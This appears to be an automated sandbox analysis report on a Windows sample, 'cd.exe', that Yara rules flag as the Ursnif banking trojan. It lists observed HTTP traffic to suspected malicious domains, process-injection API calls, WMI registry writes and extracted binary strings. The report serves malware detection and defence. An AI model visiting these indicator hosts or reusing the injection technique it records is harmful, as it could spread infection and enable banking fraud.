Source: global traffic	HTTP traffic detected: GET /click.php?key=qxr7sx5xq96osnrqgm1a&subid=87057224030&bid=0.025&site=413999995&source=413999995&clickid=87057224030&browser=Internet+Explorer+11&geo=CH&campaign_name=CH&device=Desktop&os=Windows+10 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Referer: http://menehleibe.com/Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: gertrk.com
Source: global traffic	HTTP traffic detected: GET /nlp/index.php?url_bnm_redirect=http://google.com HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Referer: http://menehleibe.com/Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: gertrk.comCookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gertrk.comConnection: Keep-AliveCookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
Source: global traffic	HTTP traffic detected: GET /?gws_rd=ssl HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.google.com
Source: global traffic	HTTP traffic detected: GET /images/branding/googlelogo/2x/googlelogo_color_272x92dp.png HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.google.com/?gws_rd=sslAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: www.google.comConnection: Keep-AliveCookie: CONSENT=PENDING+509
Source: global traffic	HTTP traffic detected: GET /gen_204?ei=rKtAYY2rHY25kwWZrp3YAw&vet=10ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQhJAHCBQ..s&gl=GB&pc=SEARCH_HOMEPAGE&isMobile=false HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.google.com/?gws_rd=sslAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: www.google.comConnection: Keep-AliveCookie: CONSENT=PENDING+509
Source: global traffic	HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.png HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.google.com/?gws_rd=sslAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: www.google.comConnection: Keep-AliveCookie: CONSENT=PENDING+509
Source: global traffic	HTTP traffic detected: GET /images/bjM3gVEtKlUeWm2NnKw3/UycpbcugJuZhqNGVGh8/kwk4esZ_2F2xjDYD_2BSa_/2F328cjxY6AQM/kA5SneVc/JKL1AVTBXoV77D1JaKVgbri/d8lSYHOR5C/_2FOPoUzuMMso_2Bp/A_2Ffbx4wppa/aSm6IWIjM6R/Y44GbYY.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: menehleibe.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: menehleibe.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.google.com

Source: unknown	HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.102.106:443 -> 192.168.2.6:49751 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cd.exe PID: 6888, type: MEMORYSTR

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Users\user\Desktop\cd.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\cd.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\cd.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Users\user\Desktop\cd.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\cd.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\cd.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: cd.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\cd.exe

Code function: 1_2_0040323C

Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_00401873 GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_0040171A NtMapViewOfSection,RtlNtStatusToDosError,
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_0040202A NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_004022D1 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,FindCloseChangeNotification,memset,
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_004020E9 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,memcpy,
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_00402F98 memset,memcpy,NtSetContextThread,LdrInitializeThunk,RtlNtStatusToDosError,GetCalendarWeekNumber,GetLastError,
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_00401646 NtGetContextThread,LdrInitializeThunk,RtlNtStatusToDosError,
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_00402550 NtUnmapViewOfSection,RtlNtStatusToDosError,FindCloseChangeNotification,memset,LdrInitializeThunk,LdrInitializeThunk,memcpy,
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_0040345D NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_004018E5 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_004031F0 NtGetContextThread,
Source: C:\Users\user\Desktop\cd.exe	Code function: 1_2_004012A3 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,

Source: cd.exe	Binary or memory string: zD%s\service_log.txtERROR! %s %s : %s%s\StringFileInfo\040904b0\OriginalFilename\installpath_SkipServiceVerificationChecks%s\bin\service_minimum_versions.vdf%s\service_minimum_versions.vdfVersion file missing or corrupt: %s vs cd.exe
Source: cd.exe	Binary or memory string: M\VarFileInfo\Translation\D:\B\T\Imports\Open\Chrome\Chrome\src\base\file_version_info_win.ccCompanyNameCompanyShortNameInternalNameProductNameProductShortNameProductVersionFileDescriptionFileVersionOriginalFilenameSpecialBuild\StringFileInfo\%04x%04x\%ls vs cd.exe

Source: cd.exe

Static PE information: Number of sections : 71 > 10

Source: cd.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: cd.exe

ReversingLabs: Detection: 60%

Source: cd.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\cd.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\cd.exe 'C:\Users\user\Desktop\cd.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2

Source: C:\Users\user\Desktop\cd.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F14FAF2F-15AF-11EC-90E5-ECF4BB2D2496}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF1C6E09CA4CF5EBDD.TMP

Jump to behavior

Source: cd.exe	Binary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\Srv2\Device\LanmanServer\Device\LanmanRedirector\%s\ipc$Use PsKill to terminate the remotely running program.
Source: cd.exe	Binary string: HNtOpenKeyExNtCreateKey: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\registry_dispatcher.ccConsider modifying policy using this policy rule: REG_ALLOW_ANYNtOpenKey: STATUS_ACCESS_DENIED\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ntdll.dll
Source: cd.exe	Binary string: A@\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ntdll.dll
Source: cd.exe	Binary string: A4057363broker_pdfshell_sh/if/id %uAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Software\Adobe\Acrobat Reader\DC\FeatureStateSoftware\Adobe\Adobe Acrobat\DC\FeatureState
Source: cd.exe	Binary string: zl`l@`l@aFatlTraceGeneral\??\\Device\\\?\UNC\\??\UNC\/?/UNC/atlTraceCOM\?\UNC\\??\pipe\\??\mailslot\atlTraceQI\\?\\\.\\\atlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLib:Invalid DateTimeInvalid DateTimeSpanMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exceptionMath overflow exception (cont.) (cont.)Math overflow exceptionrSOFTWARE\Adobe\AcroPerfMath overflow exceptionbLaunchTimingMath overflow exceptionbExtendedProfilingMath overflow exceptionbDetailedHandlerProfilingMath overflow exceptiontOutputDirMath overflow exceptionMath overflow exceptionlabeled blockMath overflow exceptionMath overflow exceptionbFilemonMarkersrP[h`+Md[h
Source: cd.exe	Binary string: FNtCreateSection: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\signed_dispatcher.ccreal_path: NtOpenSection: STATUS_ACCESS_DENIED\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ntdll.dll
Source: cd.exe	Binary string: M\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\SystemTopicsSysItemsSystemFormatsCF_TEXTStatusReadyHelpYou are connected to Adobe Acrobat.ReturnMessage
Source: cd.exe	Binary string: L\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Ntdll.dllNtQueryInformationProcessSTATIC_acroS_winAcroPDF.dllAcroPDFImpl.dllNPPdf32.dllPDFPrevHndlr.dllPDFPrevHndlrShim.dllPDFThumbHndlr.dllPDFShell.dllPDFPropHndlr.dllAcroSBL/b/id/id4057363/if%s_%lu_%lu/acGeckoPluginWindowplugin-container.exe4021007AcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeSTATICswBrowser\|acr\|\FNP_Act_Installer.dll\|acr\|\SynchronizerApp.exe\|acr\|\Javascripts\JSByteCodeWin.bin\|acr\|\AdobeUpdater.dll\|sys\|\ddraw.dll\|sys\|\dciman32.dllAdobeAcrobatSpeedLaunchCmdWndSOFTWARE\Adobe\Adobe Acrobat\DC\AcroSpeedLaunchAcrobatSDIWindowAdobeAcrobatAcrobatTimerWndAcrobat runningMcShieldAvSynMgrnavapsvcAntiVirServiceAVPekrnIsVirusCheckerPresentServicesActivefound servicerunningIsVirusCheckerPresent doneAbortWM_CLOSEerr in TimeoutOrExitWaitUntilTimeoutOrMustExitOrVirusCheckerPresenterr in checkerSetThreadPriority worker thread lownot all ops, go into vc modewaitingmsvcr100.dllmsvcp100.dlldo Opsworker throw!worker doneTerminate thread!
Source: cd.exe	Binary string: A\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ F] F]P
Source: cd.exe	Binary string: \\\?\.dll.apibad allocationSOFTWARE\Adobe\Adobe Acrobat\DC\InstallPathSOFTWARE\Adobe\Acrobat Reader\DC\InstallPath\|ci\|\|cpg\|\|cc\|\|cpt\|\|cpe\|\|cf\|\|csu\|\|cr\|\|cst\|\|cbb\|\|csm\|\|cdd\|\|cdr\|\|cn\|\|cnh\|\|cfo\|\|ct\|\|ccsm\|\|ccp\|\|ccs\|\|ccd\|\|cad\|\|cph\|\|cas\|\|cca\|\|ccf\|\|cic\|\|cco\|\|ch\|\|cmm\|\|cla\|\|ccad\|\|cpf\|\|cmp\|\|cpfc\|\|ccdc\|\|crs\|\|crl\|\|ccam\|\|cat\|\|tmp\|\|win\|\|sys\|\|root\|\|ladl\|\|acr\|\|acrp\|\|rdr\|\|rdrp\|An update to Acrobat or Reader is being installed. Please wait until installation is complete and then try again.atlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinAcroUnloadStubMsgAcroReloadStubMsgAcrobatUnloadMsgAcrobatReloadMsgAcroStubUnloadWClassAcroStubUnloadWClassAcroStubUnloadWClassatlTraceNotImplatlTraceAllocationSOFTWARE\Adobe\Adobe Acrobat\DC\LanguageUISOFTWARE\Adobe\Adobe Acrobat\DC\LanguageUIAcroUnloadStubMsgAcroReloadStubMsgatlTraceExceptionAcroRd32.dllAcrobat.dllAcRd32_D.dllAcroDbg.dllSOFTWARE\Adobe\Adobe Acrobat\DC\appvatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLibAcrobat.dllAcrobat32OL.dllSoftware\Adobe\Adobe Acrobat\DC\SecurityDEPSoftware\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDownbEnableATL7Compatkernel32.dllGetProcessDEPPolicykernel32.dllSetProcessDEPPolicyntdll.dllNtSetInformationProcess\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\AppDoNotTakePDFOwnershipAtLaunchAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt /if/if pdfshell_prev/CRlaunchCEFInLowIntegrityAdobeAcrobatSpeedLaunchCmdWndAdobeReaderSpeedLaunchCmdWndAcrobat Viewer Safe DDEacrobat_sbxEDIT/if/CR/ac/actuser32.dllSetProcessDPIAwareacrobatres.dllAXE8SharedExpat.dll/dllLoad AppInitEventbProtectedModeSOFTWARE\Policies\Adobe\Adobe Acrobat\DCbIPMTurnedPMONbLastExitNormaliForceExitReasonSoftware\Adobe\Adobe Acrobat\DC\PrivilegedSoftware\Adobe\Adobe Acrobat\DC\ExitSectionSoftware\Adobe\Adobe Acrobat\DC\ExitSectioniPMSilentOffiNumSessionsSoftware\Adobe\Adobe Acrobat\DC\PrivilegedSoftware\Adobe\Adobe Acrobat\DC\PrivilegediSessionThresholdiPMSilentOffSoftware\Adobe\Adobe Acrobat\DC\PrivilegedSoftware\Adobe\Adobe Acrobat\DC\PrivilegedbProtectedMode\x86\Acrobat\Acrobat.exe/dllLoadbLTEnableDLLOptimizationAdobe AcrobatSOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockdownDC_AcroAppTimerAcroExe load doneacrord32_super_sbx/if/ifpdfshell_prev/slModebAllowWindowCreationOnBrowserSoftware\Adobe\Adobe Acrobat\DC\PrivilegedUseSandboxModalWndReparenting/slModeopenSoftware\Adobe\Adobe Acrobat\DC\AVGeneraliSLExitTimeHighPartiSLExitTimeLowPartFatal ErrorAcrobat failed to load its Core DLLhttps://helpx.adobe.com/acrobat/kb/acrobat-failed-load-core-dll.htmlAcroWinMainSandbox\??\AcroviewA21CALS_PreflightDdeService\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device
Source: cd.exe	Binary string: fH', pattern = ', semantics = , subsystem = error = Failed to add sandbox rule.D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\sandbox_policy_base.ccinterceptions setup failed - error:process initialization failed - error:g_shared_delayed_integrity_levelg_shared_delayed_mitigationsCreateAppContainerToken\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ F]
Source: cd.exe	Binary string: #O\\.\\\?\CreateNamedPipe: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\named_pipe_dispatcher.ccname: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\invalid stoull argumentstoull argument out of range
Source: cd.exe	Binary string: Zh#M\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\dZh0
Source: cd.exe	Binary string: DEST\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Embed SourceEmbedded ObjectatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLibatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLib\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\AcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLibCONTENTSPDFCONTENTSCONTENTS\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\atlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLibGetOpenFileNameW`
Source: cd.exe	Binary string: M\Device\Mup\Device\\SystemRoot\\Device\LanmanRedirector\
Source: cd.exe	Binary string: NBrokerEvent0x%XFailed to construct job object for sandbox process - error:D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\broker_services.ccFailed to construct restricted tokens for sandbox process - error:4277065__security_cookieg_sandbox_winsta_handleg_sandbox_desktop_handleg_sandbox_main_thread_idg_broker_already_in_job_that_prohibits_breakawayg_is_compute_only_sandboxg_under_appv_virtualizationg_in_pm_appcontainerg_in_pv_appcontainer%sg_appcontainer_named_object_directory_handleg_appcontainer_object_dirg_broker_process_idFailed to add target - error:AcroBrokerSessionEndMsgListenerClassAcroBrokerSessionEndMsgListener\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
Source: cd.exe	Binary string: \\\?\.dll.apibad allocationSOFTWARE\Adobe\Adobe Acrobat\DC\InstallPathSOFTWARE\Adobe\Acrobat Reader\DC\InstallPath\|ci\|\|cpg\|\|cc\|\|cpt\|\|cpe\|\|cf\|\|csu\|\|cr\|\|cst\|\|cbb\|\|csm\|\|cdd\|\|cdr\|\|cn\|\|cnh\|\|cfo\|\|ct\|\|ccsm\|\|ccp\|\|ccs\|\|ccd\|\|cad\|\|cph\|\|cas\|\|cca\|\|ccf\|\|cic\|\|cco\|\|ch\|\|cmm\|\|cla\|\|ccad\|\|cpf\|\|cmp\|\|cpfc\|\|ccdc\|\|crs\|\|crl\|\|ccam\|\|cat\|\|tmp\|\|win\|\|sys\|\|root\|\|ladl\|\|acr\|\|acrp\|\|rdr\|\|rdrp\|An update to Acrobat or Reader is being installed. Please wait until installation is complete and then try again.atlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinAcroUnloadStubMsgAcroReloadStubMsgAcrobatUnloadMsgAcrobatReloadMsgAcroStubUnloadWClassAcroStubUnloadWClassAcroStubUnloadWClassatlTraceNotImplatlTraceAllocationSOFTWARE\Adobe\Adobe Acrobat\DC\LanguageUISOFTWARE\Adobe\Adobe Acrobat\DC\LanguageUIAcroUnloadStubMsgAcroReloadStubMsgatlTraceExceptionAcroRd32.dllAcrobat.dllAcRd32_D.dllAcroDbg.dllSOFTWARE\Adobe\Adobe Acrobat\DC\appvatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLibAcrobat.dllAcrobat32OL.dllAcroRd32.dllSoftware\Adobe\Adobe Acrobat\DC\SecurityDEPSoftware\Policies\Adobe\Acrobat Reader\DC\FeatureLockDownbEnableATL7Compatkernel32.dllGetProcessDEPPolicykernel32.dllSetProcessDEPPolicyntdll.dllNtSetInformationProcessAppDoNotTakePDFOwnershipAtLaunchAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt /if/if pdfshell_prev/CRlaunchCEFInLowIntegrityAdobeAcrobatSpeedLaunchCmdWndAdobeReaderSpeedLaunchCmdWndAcrobat Viewer Safe DDEacrord32_sbxEDIT/if/CR/ac/actuser32.dllSetProcessDPIAware/pass bWasUserPassThroughedSoftware\Adobe\Acrobat Reader\DC\AVGeneralacrord32res.dllAXE8SharedExpat.dll/dllLoad 